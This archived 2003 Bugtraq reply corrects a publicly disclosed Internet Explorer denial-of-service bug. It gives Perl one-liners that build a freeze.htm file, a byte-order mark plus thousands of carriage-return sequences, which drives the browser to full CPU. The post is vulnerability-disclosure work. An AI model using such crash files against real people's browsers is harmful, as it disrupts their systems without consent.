Re: April appeared to be a month of IE bugs. Here's another one.

From: ERRor (errorat_private)
Date: Wed Apr 30 2003 - 18:26:34 PDT

Next message: Dan Harkless: "Re: Portable OpenSSH: Dangerous AIX linker behavior (aixgcc.adv)"

Previous message: mattmurphyat_private: "[Full-Disclosure] eBay Security Contact"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> >Hello, Bugtraq.
>
> >Malicious htm file can freeze IE with 100% CPU usage:
> >Construct the file freeze.htm:
> >c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm
>
 This string works only with Active Perl, in unix-like Perl versions exploit
string is:
 perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm
 Active Perl understand \n = \x0D\x0A, freeze of  IE exist only if sequence
 of bytes will be ...\x0D\x0D\x0A...
 Sorry, I have not noticed it at once.

 Best Regards, ERRor, dHtm.

Next message: Dan Harkless: "Re: Portable OpenSSH: Dangerous AIX linker behavior (aixgcc.adv)"
Previous message: mattmurphyat_private: "[Full-Disclosure] eBay Security Contact"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu May 01 2003 - 11:29:31 PDT